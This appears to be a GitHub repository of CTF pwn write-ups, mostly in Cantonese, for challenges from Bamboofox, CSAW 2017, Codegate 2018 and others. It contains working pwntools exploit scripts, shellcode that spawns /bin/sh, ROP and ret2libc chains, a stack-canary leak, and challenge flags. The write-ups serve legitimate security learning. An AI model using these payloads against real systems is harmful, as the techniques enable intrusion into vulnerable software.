6 | > 7 | >By the way, here is a so called [return-to-csu](https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR.pdf) method which you may want to know :P 8 | >(though personally thought this should be well-known in 2018) 9 | > 10 | >202.120.7.203:666 11 | > 12 | >In memory of Stephen William Hawking (1942–2018). 13 | 14 | 15 | 呢條係比賽solve唔到,之後睇其他writeup 加返d sleep上去就run到 ..... 16 | 17 | 其實我本身個solution都唔太可能solve得切,因為要brute force 一個半byte = 16^3 18 | 19 | Total =flag length * 16^3 * printable ascii char 20 | 21 | 呢題係Defcon Qual 2017 mute翻版,有seccomp, no output 22 | 23 | ``` 24 | # line CODE JT JF K 25 | # ================================= 26 | # 0000: 0x20 0x00 0x00 0x00000004 A = arch 27 | # 0001: 0x15 0x00 0x0d 0xc000003e if (A != ARCH_X86_64) goto 0015 28 | # 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 29 | # 0003: 0x35 0x0b 0x00 0x40000000 if (A >= 0x40000000) goto 0015 30 | # 0004: 0x15 0x09 0x00 0x00000000 if (A == read) goto 0014 31 | # 0005: 0x15 0x08 0x00 0x00000003 if (A == close) goto 0014 32 | # 0006: 0x15 0x07 0x00 0x0000000a if (A == mprotect) goto 0014 33 | # 0007: 0x15 0x06 0x00 0x0000003c if (A == exit) goto 0014 34 | # 0008: 0x15 0x05 0x00 0x000000e7 if (A == exit_group) goto 0014 35 | # 0009: 0x15 0x00 0x05 0x00000002 if (A != open) goto 0015 36 | # 0010: 0x20 0x00 0x00 0x0000001c A = args[1] >> 32 37 | # 0011: 0x15 0x00 0x03 0x00000000 if (A != 0x0) goto 0015 38 | # 0012: 0x20 0x00 0x00 0x00000018 A = args[1] 39 | # 0013: 0x15 0x00 0x01 0x00000000 if (A != 0x0) goto 0015 40 | # 0014: 0x06 0x00 0x00 0x7fff0000 return ALLOW 41 | # 0015: 0x06 0x00 0x00 0x00000000 return KILL 42 | 43 | 44 | ``` 45 | 題目有一個bof, 可以用黎read ROP gadget,trigger mprotect 改變bss由 rw->rwx, input shellcode 去read flag 46 | 47 | 由於seccomp ban左 write, 所以要用side channel attack leak flag 48 | 49 | gadget 主要都係用 csu gadget (universal gadget) 50 | 51 | 52 | 呢條其實唔洗brute force ASLR都solve到, 因為alarm libc implementation 係用 syscall, 53 | 
54 | 而read 會將input length pass 入eax,只要read 10 byte ->EAX /RAX = 0xa -> syscall 0xa ==mprotect 55 | 56 | 少改一下defcon mute d shellcode-> input shellcode to known bss->leak flag 57 | 58 | [solve.py](solve.py) 59 | 60 | 61 | # FLAG 62 | 63 | ``` 64 | flag{even_black_holes_leak_information_by_Hawking_radiation} 65 | ``` 66 | 67 | Again,in memory of Stephen William Hawking. 68 | 69 | # Reference 70 | 71 | 1. http://asiagaming.tistory.com/153 72 | -------------------------------------------------------------------------------- /ROP/Bamboofox 2017 infant-go/infant-gogogo.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #r=process('./infant-gogogo') 4 | #nc bamboofox.cs.nctu.edu.tw 58795 5 | 6 | host = "bamboofox.cs.nctu.edu.tw" 7 | port = 58795 8 | r = remote(host,port) 9 | 10 | #gdb.attach(r) 11 | 12 | 13 | pop_rax_ret=0x0000000000404656 14 | syscall=0x00000000004520b9 15 | #0x0000000000485abd : pop rdi ; cmp dword ptr [rcx], eax ; add byte ptr [rax + 0x39], cl ; ret 16 | pop_rdi=0x0000000000485abd 17 | 18 | payload="A"*256 19 | #0x0000000000413d6d : pop rdx ; xor ah, byte ptr [rsi - 9] ; ret 20 | #0x0000000000408437 : pop rsi ; dec dword ptr [rax + 0x21] ; ret 21 | buf=0x0052e2a0 22 | rsi=0x0000000000408437 23 | rdx=0x0000000000413d6d 24 | 25 | #call read rdi :fd=0 26 | #rsi:buf 27 | #rdx:size 28 | #rax:0x00 29 | payload+=p64(pop_rax_ret)+p64(buf+0x200)+p64(pop_rdi)+p64(0x0)+p64(rsi)+p64(buf+0x300)+p64(rdx)+p64(0x8)+p64(pop_rax_ret)+p64(0)+p64(syscall) 30 | 31 | 32 | #rsi=0 33 | #rdx=0 34 | payload+=p64(pop_rax_ret)+p64(buf+0x200)+p64(pop_rdi)+p64(buf+0x300)+p64(rsi)+p64(buf+0x200)+p64(rdx)+p64(0x0)+p64(rsi)+p64(0x0)+p64(pop_rax_ret)+p64(0x3b)+p64(syscall) 35 | 36 | sleep(1) 37 | r.sendline(payload) 38 | 39 | sleep(1) 40 | 41 | r.sendline("/bin/sh\x00") 42 | r.sendline("ls -al") 43 | 44 | r.interactive() 45 | 46 | #$ cd home 47 | #$ ls 48 | #ctf 49 | #$ cd ctf 50 | #$ ls 51 | #ctf 52 | #flag 53 | 
#infant-gogogo 54 | #$ cat flag 55 | #BAMBOOFOX{G0LaNg_iS_aw3s0m3ls!} 56 | -------------------------------------------------------------------------------- /ROP/Bamboofox 2017 infant-go/infant-gogogo.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Bamboofox 2017 infant-go/infant-gogogo.zip -------------------------------------------------------------------------------- /ROP/Bamboofox 2017 infant-go/infant-gotoheaven.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #r=process('./infant-gogogo') 4 | #nc bamboofox.cs.nctu.edu.tw 58795 5 | 6 | host = "bamboofox.cs.nctu.edu.tw" 7 | port = 58796 8 | r = remote(host,port) 9 | #r=process("./infant-gotoheaven") 10 | #gdb.attach(r) 11 | 12 | payload="A"*224 13 | 14 | 15 | pop_rax_ret=0x0000000000404656 16 | #0x000000000043e71d : xchg eax, edi ; ret 17 | 18 | xchg_eax_edi=0x000000000043e71d 19 | syscall=0x00000000004553e9 20 | 21 | #0x00000000004143ed : pop rdx ; xor ah, byte ptr [rsi - 9] ; ret 22 | 23 | #0x0000000000408497 : pop rsi ; dec dword ptr [rax + 0x21] ; ret 24 | 25 | pop_rdx_ret=0x00000000004143ed 26 | pop_rsi_ret=0x0000000000408497 27 | bss=0x0057d000+0x300 28 | 29 | #read 30 | #rax=0x0 31 | #rdi=fd=0 32 | #rsi=buf ok 33 | #rdx size ok 34 | payload+=p64(pop_rax_ret)+p64(bss+0x300)+p64(pop_rsi_ret)+p64(bss+0x300)+p64(pop_rdx_ret)+p64(0x8)+p64(pop_rsi_ret)+p64(bss+0x200)+p64(pop_rax_ret)+p64(0x0)+p64(xchg_eax_edi)+p64(pop_rax_ret)+p64(0)+p64(syscall) 35 | 36 | 37 | payload+=p64(pop_rax_ret)+p64(bss+0x300)+p64(pop_rsi_ret)+p64(bss+0x300)+p64(pop_rdx_ret)+p64(0x0)+p64(pop_rsi_ret)+p64(0)+p64(pop_rax_ret)+p64(bss+0x200)+p64(xchg_eax_edi)+p64(pop_rax_ret)+p64(0x3b)+p64(syscall) 38 | 39 | sleep(1) 40 | 41 | r.sendline(payload) 42 | sleep(1) 43 | 44 | r.sendline("/bin/sh\x00") 45 | 46 | r.sendline("ls -al") 47 | 48 | 
r.interactive() 49 | #BAMBOOFOX{GOLANG_PWnnnnnnnIng_iS_r3A11Y_W3iRdO_O} 50 | 51 | #execve 52 | #rax=0x3b 53 | #rdi bash 54 | #rsi =0 ok 55 | #rdx=0 ok 56 | -------------------------------------------------------------------------------- /ROP/Bamboofox 2017 infant-go/infant-gotoheaven.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Bamboofox 2017 infant-go/infant-gotoheaven.zip -------------------------------------------------------------------------------- /ROP/Bamboofox 2017 infant-go/readme.md: -------------------------------------------------------------------------------- 1 | # Bamboofox 2017 infant-gogogo & infant-gotoheaven 2 | 3 | 4 | 兩條基本嘅buffer overflow with ROP不過係用golang compile, 算係1 set 向Seccon 2017 babystack致敬嘅題目 5 | 6 | 由於兩個都係static linked, 所以乜gadget都有,例如syscall, 只要跟住syscall table 汁藥就可以get shell 7 | 8 | 不過要留意好多gadget 都會對其他register 有operation 9 | 10 | 例如 infant-gogogo : 11 | 12 | ```C 13 | #0x0000000000413d6d : pop rdx ; xor ah, byte ptr [rsi - 9] ; ret 14 | #0x0000000000408437 : pop rsi ; dec dword ptr [rax + 0x21] ; ret 15 | ``` 16 | 所以行呢句gadget 嘅時候要保證related register 唔係=0x0 17 | 18 | 例如: 19 | ```C 20 | #0x0000000000413d6d : pop rdx ; xor ah, byte ptr [rsi - 9] ; ret 21 | ``` 22 | 23 | 就要保證RSI 唔係等於0x0 , 24 | 25 | 所以就要去bss 段求其塞d valid memory address去個d 相關register: 26 | 27 | For example: 28 | 29 | ```python 30 | payload="A"*256 31 | #0x0000000000413d6d : pop rdx ; xor ah, byte ptr [rsi - 9] ; ret 32 | #0x0000000000408437 : pop rsi ; dec dword ptr [rax + 0x21] ; ret 33 | buf=0x0052e2a0 34 | rsi=0x0000000000408437 35 | rdx=0x0000000000413d6d 36 | #call read rdi :fd=0 37 | #rsi:buf 38 | #rdx:size 39 | #rax:0x00 40 | payload+=p64(pop_rax_ret)+p64(buf+0x200) 41 | payload+=p64(pop_rdi)+p64(0x0)+p64(rsi)+p64(buf+0x300) 42 | payload+=p64(rdx)+p64(0x8)+p64(pop_rax_ret)+p64(0)+p64(syscall) 43 | ``` 44 | 45 | # Solution : 46 | 
[infant-gogogo](infant-gogogo.py)


[infant-gotoheaven](infant-gotoheaven.py)


# Flag

```
infant-gogogo: BAMBOOFOX{G0LaNg_iS_aw3s0m3ls!}

infant-gotoheaven : BAMBOOFOX{GOLANG_PWnnnnnnnIng_iS_r3A11Y_W3iRdO_O}

```
# Remark
If IDA Pro's F5 (decompiler) fails on these binaries, try Option->Compiler and set sizeof(int)=4


# Reference

1. http://shift-crops.hatenablog.com/entry/2017/12/09/200440

2. https://bbs.pediy.com/thread-223281.htm




--------------------------------------------------------------------------------
/ROP/Bugsbunnyctf Pwn100/pwn100:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Bugsbunnyctf Pwn100/pwn100
--------------------------------------------------------------------------------
/ROP/Bugsbunnyctf Pwn100/readme.md:
--------------------------------------------------------------------------------
# Bugsbunnyctf Pwn100

This one is actually not hard, but I messed up the shellcode during the contest; reading the writeup afterwards, it turns out you have to write your own shellcode ༼☯﹏☯༽

checksec

No NX, no canary

```
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
```

There is a buffer overflow vulnerability

ret is at input+28

input is in eax

```
────────────────────────────────── Registers ───────────────────────────────────
EAX: 0xffffd1f0 ('A' )
EBX: 0x0
ECX: 0xfbad2288
EDX: 0xf7fad87c --> 0x0
ESI: 0x1
EDI: 0xf7fac000 --> 0x1b2db0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd210 --> 0x0
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)

Legend: code, data, rodata, heap, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()
gdb-peda$
```

ROPgadget:

```
0x08048386 : call eax
```


shellcode:


```x86
xor eax,eax
xor ecx,ecx
xor edx,edx
xor esi,esi
mov eax,0x0b
lea ebx,[esp-8]
int 0x80
/bin/sh\x00

```

Sad~~~~~

# Reference

1. http://sw1ss.team/bugs_bunny_ctf_2k17/2017/07/31/bugs_bunny_ctf_2k17-pwn100/

--------------------------------------------------------------------------------
/ROP/Bugsbunnyctf Pwn100/solve.py:
--------------------------------------------------------------------------------
from pwn import *

host = "54.153.19.139"
port = 5252

#r = remote(host,port)
r=process('./pwn100')

call_eax=0x08048386
##
shellcode="\x31\xC0\x31\xC9\x31\xD2\x31\xF6\xB8\x0B\x00\x00\x00\x8D\x5C\x24\xF8\xCD\x80"
shellcode+= '/bin/sh\x00'
payload="\x90"*(28-len(shellcode))
payload+=shellcode
payload+=p32(call_eax)

print len(payload)

r.sendline(payload)

r.sendline("ls -al")


r.interactive()
--------------------------------------------------------------------------------
/ROP/CSAW 2017 pwn 100 scv/libc-2.23.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/CSAW 2017 pwn 100 scv/libc-2.23.so
--------------------------------------------------------------------------------
/ROP/CSAW 2017 pwn 100 scv/readme.md:
--------------------------------------------------------------------------------
# CSAW 2017 pwn 100 scv

# Challenge:


> SCV
> SCV is too hungry to mine the minerals. Can you give him some food?
> nc pwn.chal.csaw.io 3764

>[scv](scv)

>[libc-2.23.so](libc-2.23.so)


This one is a little annoying, but not hard.

Checksec:

```
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

```
IO dump:

```
-------------------------
[*]SCV GOOD TO GO,SIR....
-------------------------
1.FEED SCV....
2.REVIEW THE FOOD....
3.MINE MINERALS....
-------------------------
>>

```

There are 3 functions:

1. fill the buffer

2. print the buffer

3. exit


IDA code (there is a lot of noise, so only the key part is kept)

```C++
.
.
char buf; // [sp+10h] [bp-B0h]@6
.
.

v23 = read(0, &buf, 248uLL);
.

```

Only one or two lines are actually useful; the rest is noise.

These two lines identify the buffer overflow: the buffer is only 176 bytes, but read() accepts 248. How could it not crash.

asm code:

```asm
.text:0000000000400A96 buf = byte ptr -0B0h
.text:0000000000400A96 var_8 = qword ptr -8
.text:0000000000400A96
.text:0000000000400A96 push rbp
.text:0000000000400A97 mov rbp, rsp
.text:0000000000400A9A sub rsp, 0C0h
.text:0000000000400AA1 mov rax, fs:28h
.text:0000000000400AAA mov [rbp+var_8], rax
.text:0000000000400AAE xor eax, eax
.text:0000000000400AB0 mov rax, cs:stdout

```

We know the canary is at rbp-8; once the canary is leaked we can write the return address freely and get a shell.

After a bit of testing, you find that the print-buffer function prints 8 extra bytes, or up to the first \x00.

We know the canary's last (lowest) byte is \x00, so if we overwrite that last byte with something else, the canary gets leaked.

leak canary payload= payload='b'*167+'a'+'g'

Subtract 0x67 ('g') from the leaked value and you have the canary.

The next step is to leak a libc address.
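The canary mechanics this leak depends on, as an added illustration (this is not code from the writeup or from the challenge binary): a constructed C model of the scv frame, with a 176-byte buffer followed by the canary at rbp-8, whose lowest byte glibc keeps at 0x00. `overflow_detected` shows that the epilogue check catches any write that reaches the canary slot, and `leak_length` shows why that null low byte normally stops a string-style print right at the end of the buffer, and why clobbering exactly that one byte exposes the remaining seven. The frame layout, the canary value and the helper names are all assumptions made for the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of the scv stack frame (an assumption, not the real
 * binary): 176-byte buffer, then the canary at rbp-8, saved rbp, return address. */
typedef struct {
    char     buf[176];
    uint64_t canary;
    uint64_t saved_rbp;
    uint64_t ret_addr;
} frame_t;

/* glibc forces the lowest canary byte to 0x00 so that string functions neither
 * copy over it nor print past it.  random_bits stands in for the randomness the
 * loader provides; the value used below is constructed for the model. */
static uint64_t make_canary(uint64_t random_bits) {
    return random_bits & ~(uint64_t)0xff;
}

/* Models read(0, &buf, n) with n larger than the buffer: bytes land in the
 * frame starting at buf and keep going.  The write goes through the struct as
 * a byte array so the model stays well-defined; n is clamped to the frame. */
static void unchecked_read(frame_t *f, const char *input, size_t n) {
    if (n > sizeof *f) n = sizeof *f;
    memcpy((unsigned char *)f, input, n);
}

/* The function-epilogue check: compare the slot against the reference copy.
 * In a real binary a mismatch calls __stack_chk_fail, which aborts. */
static int canary_intact(const frame_t *f, uint64_t reference) {
    return f->canary == reference;
}

/* Fill the frame with n bytes of input and report whether the epilogue check
 * would fire: 1 if the canary was modified, 0 if it is intact. */
int overflow_detected(size_t n) {
    frame_t f;
    char input[sizeof f];
    uint64_t reference = make_canary(0x1122334455667700ULL);  /* constructed */
    memset(&f, 0, sizeof f);
    f.canary = reference;
    memset(input, 'b', sizeof input);
    unchecked_read(&f, input, n);
    return !canary_intact(&f, reference);
}

/* Number of bytes a puts()-style print starting at buf would emit after n
 * bytes of input: it stops at the first 0x00 byte anywhere in the frame. */
size_t leak_length(size_t n) {
    frame_t f;
    char input[sizeof f];
    const unsigned char *p = (const unsigned char *)&f;
    size_t i;
    memset(&f, 0, sizeof f);
    f.canary = make_canary(0x1122334455667700ULL);  /* constructed */
    memset(input, 'b', sizeof input);
    unchecked_read(&f, input, n);
    for (i = 0; i < sizeof f && p[i] != 0; i++)
        ;
    return i;
}
```

With 176 bytes the print stops at the canary's null byte and the check passes; with 177 bytes the null byte is gone, the print runs on through the other seven canary bytes, and the epilogue check fails. That is why a raw `read()` with an oversized count is what makes this frame leakable, and why on a real target the failed check shows up as a SIGABRT from `__stack_chk_fail`, which is the event a crash monitor should be alerting on.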

In the earlier testing, besides the 8 extra printed bytes, I also found that once the canary is corrupted, choosing exit triggers a stack check failure. That means exit is where the function returns, so we can use it to return to any address we like: once we have the canary, the return address is ours to write.

Because NX is enabled, the only way is ROP + return-to-libc.

Since this is x64 and x64 has its calling convention, puts reads its parameter from rdi, so we use a pop_rdi_ret gadget to move the puts GOT entry (or whatever GOT entry) into rdi and let puts@plt print it.

After printing, jump back to main.

full gadget= pop_rdi_ret+PUTSGOT+PUTSPLT+main

```python

payload='b'*167+'a'+p64(canary)+"\x90"*8+p64(pop_rdi_ret)+p64(PUTSGOT)+p64(PUTSPLT)+p64(main)

```


One thing to note here: main has to be re-entered at the part that initialises the variables, but since the process never exited, the canary and the libc base do not change.

Once we have libc_base, add the offsets back and feed the payload in through the buffer-input option:

```python

payload='b'*167+'a'+p64(canary)+"\x90"*8+p64(pop_rdi_ret)+p64(libc_bin_sh)+p64(system)+p64(main)

```

Choose exit and a shell pops.

```
flag: flag{sCv_0n1y_C0st_50_M!n3ra1_tr3at_h!m_we11}

```
--------------------------------------------------------------------------------
/ROP/CSAW 2017 pwn 100 scv/scv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/CSAW 2017 pwn 100 scv/scv
--------------------------------------------------------------------------------
/ROP/CSAW 2017 pwn 100 scv/solve.py:
--------------------------------------------------------------------------------
from pwn import *

host = "pwn.chal.csaw.io"
port = 3764
r = remote(host,port)

binary = ELF('./scv')
PUTSPLT = binary.plt['puts']
PUTSGOT = binary.got['puts']

#flag{sCv_0n1y_C0st_50_M!n3ra1_tr3at_h!m_we11}

print 'puts_plt = '+hex(PUTSPLT)

print 'puts_got = '+hex(PUTSGOT)

#r=process('./scv')

#sleep(15)

pop_rdi_ret=0x400ea3

pop_rsi_r15_ret=0x400ea1

puts=0x602018

r.recvuntil(">>")


r.sendline("1")

r.recvuntil(">>")

payload='b'*167+'a'+'g'

r.send(payload)

r.recvuntil(">>")


r.sendline("2")

#b *0x400aaa

r.recvuntil('bbbbbbba')

addr=r.recvuntil('\n')

addr=addr[:-4:]

print addr

# rebuild the leaked little-endian bytes as a hex string, last byte first
stri='0x'

for i in range(len(addr)-1,-1,-1):
    temp=hex(ord(addr[i]))

    #print temp
    checker=int(temp,16)
    offset=''
    if(checker<0x10):
        offset+='0'


    temp=str(temp)

    temp=temp.split('x',1)

    stri+=offset
    stri+=temp[1]


#print 'address of position '+str(send)+' '+stri


dec=int(stri,16)
hx=hex(dec)


stack_chk_fail=0x60231C

canary=int(hx,16)

# the low byte was overwritten with 'g' (0x67) to make the leak possible; restore it
canary-=0x67

print 'Canary = '+ hex(canary)

main=0x400A96

payload='b'*167+'a'+p64(canary)+"\x90"*8+p64(pop_rdi_ret)+p64(PUTSGOT)+p64(PUTSPLT)+p64(main)
r.recvuntil(">>")

r.sendline("1")

r.recvuntil(">>")

r.send(payload)

r.recvuntil(">>")

r.sendline("3")

r.recvuntil("[*]BYE ~ TIME TO MINE MIENRALS...\n")

stack_puts=r.recvuntil('\n')

stack_puts=stack_puts[:-1:]

stri='0x'

for i in range(len(stack_puts)-1,-1,-1):
    temp=hex(ord(stack_puts[i]))

    #print temp
    checker=int(temp,16)
    offset=''
    if(checker<0x10):
        offset+='0'


    temp=str(temp)

    temp=temp.split('x',1)

    stri+=offset
    stri+=temp[1]


#print 'address of position '+str(send)+' '+stri


dec=int(stri,16)
hx=hex(dec)

print 'stack_puts_addr : '+hx

libc = ELF('libc-2.23.so')

puts__=int(hx,16)

libc_base=puts__-libc.symbols['puts']
system=libc_base+libc.symbols['system']

offset_bin_sh=0x18CD17

libc_bin_sh=libc_base+offset_bin_sh


payload='b'*167+'a'+p64(canary)+"\x90"*8+p64(pop_rdi_ret)+p64(libc_bin_sh)+p64(system)+p64(main)
r.recvuntil(">>")

r.sendline("1")

r.recvuntil(">>")

r.send(payload)

r.recvuntil(">>")

r.sendline("3")



#r.recvuntil(">>")


#r.sendline("3")



r.interactive()
--------------------------------------------------------------------------------
/ROP/CSAW 2017 pwn 75 pilot/pilot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/CSAW 2017 pwn 75 pilot/pilot
--------------------------------------------------------------------------------
/ROP/CSAW 2017 pwn 75 pilot/readme.md:
--------------------------------------------------------------------------------
# CSAW 2017 pwn 75 pilot

# Challenge:


> pilot
> Can I take your order?
> nc pwn.chal.csaw.io 8464
> 16:05 Eastern: Updated binary

>[pilot](pilot)

This one is a google-it challenge: land one working shellcode and you get the flag.

Checksec:

```
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
```

IO dump:

```
[*]Welcome DropShip Pilot...
[*]I am your assitant A.I....
[*]I will be guiding you through the tutorial....
[*]As a first step, lets learn how to land at the designated location....
[*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...
[*]Good Luck Pilot!....
[*]Location:0x7fffffffe070
[*]Command:aaaaaaaaaaa

```


NX is not enabled, so shellcode can run.

First, check where 0x7fffffffe070 points.


stack dump
```
──────────────────────────────────────── Stack ────────────────────────────────────────
0000| 0x7fffffffe070 ('a' , "\n")
0008| 0x7fffffffe078 --> 0xa616161 ('aaa\n')


```

Turns out it points at the input buffer address -_-

The exploit is: shellcode+padding+input buffer address

padding='\x90'*(40-len(shellcode))

where 40 is buffer size + saved RBP

As a noob, the next move was of course to go to shell-storm and copy a shellcode.

After copy-pasting around 10 shellcodes I got a shell; that was also the hard part of this challenge =_=

```
flag: flag{1nput_c00rd1nat3s_Strap_y0urse1v3s_1n_b0ys}

```


--------------------------------------------------------------------------------
/ROP/CSAW 2017 pwn 75 pilot/solve.py:
--------------------------------------------------------------------------------
from pwn import *

host = "pwn.chal.csaw.io"
port = 8464
r = remote(host,port)
#r=process('./pilot')

#sleep(8)

r.recvuntil("Pilot!....\n")

stringgg=r.recvuntil("\n")

addr=stringgg[12:]

print addr

base=int(addr,16)


r.recvuntil("Command:")

#flag{1nput_c00rd1nat3s_Strap_y0urse1v3s_1n_b0ys}

#buffer=40

shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
print len(shellcode)

payload=shellcode+'\x90'*(40-len(shellcode))+p64(base)

r.sendline(payload)

r.sendline("ls -al")


r.interactive()
--------------------------------------------------------------------------------
/ROP/Codegate_CTF_2018_Preliminary/BaskinRobins31/4b9a5f57118bcfb6db1d0991af9e4159:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Codegate_CTF_2018_Preliminary/BaskinRobins31/4b9a5f57118bcfb6db1d0991af9e4159
--------------------------------------------------------------------------------
/ROP/Codegate_CTF_2018_Preliminary/BaskinRobins31/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Codegate_CTF_2018_Preliminary/BaskinRobins31/libc.so.6
--------------------------------------------------------------------------------
/ROP/Codegate_CTF_2018_Preliminary/BaskinRobins31/solve.py:
--------------------------------------------------------------------------------
from pwn import *

#ELF=ELF("./BaskinRobins31")
libc=ELF("./libc.so.6")

PUTSPLT = 0x4006c0+3
PUTSGOT = 0x000000000602020

main=0x0000000000400A4B

#nc ch41l3ng3s.codegate.kr 3131

pop_rdi_ret=0x0000000000400bc3
pop_rdi_rsi_rdx_ret=0x000000000040087a
mov_eax_0=0x0000000000400b54
offset =184

host = "ch41l3ng3s.codegate.kr"
port = 3131
r = remote(host,port)
#r=process("./BaskinRobins31")
#gdb.attach(r)
pause()
r.recvuntil("3)\n")

r.sendline("2"+"a"*180+"x"*3+p64(pop_rdi_ret)+p64(PUTSGOT)+p64(PUTSPLT)+p64(main))
r.recvuntil(p64(main))
r.recvuntil("\n")
r.recvuntil("\n")
leak=r.recvuntil("\n")
leak=u64(leak[:-1].ljust(8,"\x00"))
print hex(leak)
libc_base=leak-libc.symbols['puts']
one=libc_base+0x45216
xor_rax=libc_base+0x000000000008b8c5
print "one "+hex(one)
pause()
# leak=int(leak,16)
# print "leak put "+hex(leak)

r.sendline("2"+"a"*180+"x"*3+p64(xor_rax)+p64(one))

r.interactive()

# ### This game is similar to the BaskinRobins31 game. ###
# ### The one that take the last match win ###
# There are 31 number(s)
# How many numbers do you want to take ? (1-3)
# 2aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�\x00\x00\x00\x00\x00\x00aaaaaaaaaaaaaxxx\xa4\x03\x1b\x7f\x00\x00\x16\xa2\x9f\x03\x1b\x7f\x00\x00

# $ ls
# BaskinRobins31
# flag
# $ cat flag
# flag{The Korean name of "Puss in boots" is "My mom is an alien"}
# $

--------------------------------------------------------------------------------
/ROP/Defcon_crashme/readme.md:
--------------------------------------------------------------------------------
From IDA Pro we know that we have to enter this string:

Smash me outside, how bout dAAAAAAAAAAA

(39 characters long) in answer to the question; the function scans the input string and, if it contains this, jumps to the return.

Using the crash-offset (pattern) feature of GDB, we matched the pattern against the generated one

and obtained crashoff = 72.

$ebp+8 is the return address.

Set a breakpoint at the return and

use info reg;

we can see that the rdi register currently points to the string we entered.

Use ROPgadget to search for 'jmp rdi'.

Construct the exploit as

shellcode + string + junk, padded out to 72, + gadget address

exploit
--------------------------------------------------------------------------------
/ROP/Defcon_crashme/smashme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/ROP/Defcon_crashme/smashme
--------------------------------------------------------------------------------
/ROP/Defcon_crashme/smashme.py:
--------------------------------------------------------------------------------
from pwn import *

r=process('./smashme')

#shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

shellcode="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"

jmp_rdi=0x00000000004c4e1b

phrase='Smash me outside, how bout dAAAAAAAAAAA'

payload=shellcode+phrase+'A'*6+p64(jmp_rdi)



r.sendline(payload)

#not work here
#address_read_plt=int(r.recvline(keepends=False),16)

#receive the 4 byte from the process and print it out
#address_read_plt=unpack(r.recv(4))


#r.sendline('ls')
r.interactive()
--------------------------------------------------------------------------------
/ROP/Defcon_r0pbaby/readme.md:
--------------------------------------------------------------------------------
libc.so.6: 0x00007FFFF7FF59B0

Step1:



Step2:
Symbol system: 0x00007FFFF7876460

target: execute system(bin/sh)

find bin/sh

gdb-peda$ find /bin/sh

Found 6 results, display max 6 items:

[heap] : 0x555555757040 ("/bin/sh\n")

[heap] : 0x555555757462 --> 0x68732f6e69622f ('/bin/sh')

libc : 0x7ffff7998879 --> 0x68732f6e69622f ('/bin/sh')

[stack] : 0x7fffffffb787 ("/bin/sh: 0x", '0' , "\n")

[stack] : 0x7fffffffda72 --> 0x68732f6e69622f ('/bin/sh')

[stack] : 0x7fffffffde20 --> 0x68732f6e69622f ('/bin/sh')

gdb-peda$ x/s 0x7ffff7998879

0x7ffff7998879: "/bin/sh"


offset_for_bin_sh=0x00007FFFF7FF59B0-0x7ffff7998879


offset_for_system=0x00007FFFF7FF59B0-0x00007FFFF7876460



Step3:

Because on x64 the first parameter is passed in rdi rather than pushed on the stack,

we need a pop rdi gadget to pop the address into rdi.


root@kali:~/Documents/CTF# ROPgadget --binary r0pbaby > log.txt

root@kali:~/Documents/CTF# cat log.txt |grep pop


Reference:

https://blog.skullsecurity.org/2015/defcon-quals-r0pbaby-simple-64-bit-rop

http://qiita.com/MarshMallow_sh/items/87019f038e4f5dc82451

https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/DEFCONCTF/babysfirst/r0pbaby
--------------------------------------------------------------------------------
/ROP/Insomni-hack teaser 2018 onecall/brute_force.py:
--------------------------------------------------------------------------------
from pwn import *

#r = remote("onecall.teaser.insomnihack.ch", 1337)
#616
for i in range (0x9b958, 1000000):
    #i = int("3d714", 16)
    r = process("./qemu-aarch64 -nx -L ./ ./onecall", shell=True)

    libcbase = 0
    while True:
        line = r.readline()
        if "lib/libc.so.6" in line:
            libcbase = int(line[0:16], 16)
